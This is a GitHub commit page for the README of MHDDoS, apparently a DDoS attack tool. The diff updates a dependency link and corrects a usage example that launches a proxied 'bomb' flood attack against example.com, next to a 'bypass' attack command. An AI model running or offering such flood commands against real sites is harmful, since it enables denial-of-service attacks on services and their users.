Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
PXEiYyMH8F authored Mar 6, 2022
1 parent 703b868 commit 67dbde2
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -95,7 +95,7 @@ You can download it from [GitHub Releases](https://github.com/MHProDev/MHDDoS/re
* [psutil](https://github.com/giampaolo/psutil)
* [dnspython](https://github.com/rthalley/dnspython)
* [yarl](https://github.com/aio-libs/yarl)
* [bombardier](https://github.com/mariotrucco/bombardier@78-add-proxy-support) (Optional)
* [bombardier](https://github.com/PXEiYyMH8F/bombardier/tree/78-add-proxy-support) (Optional, [installation](.github/BOMBARDIER.md))
---

**Videos**
Expand Down Expand Up @@ -136,7 +136,7 @@ pip install -r requirements.txt
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
```

* Layer4 (Server/Home):
Expand Down

0 comments on commit 67dbde2

Please sign in to comment.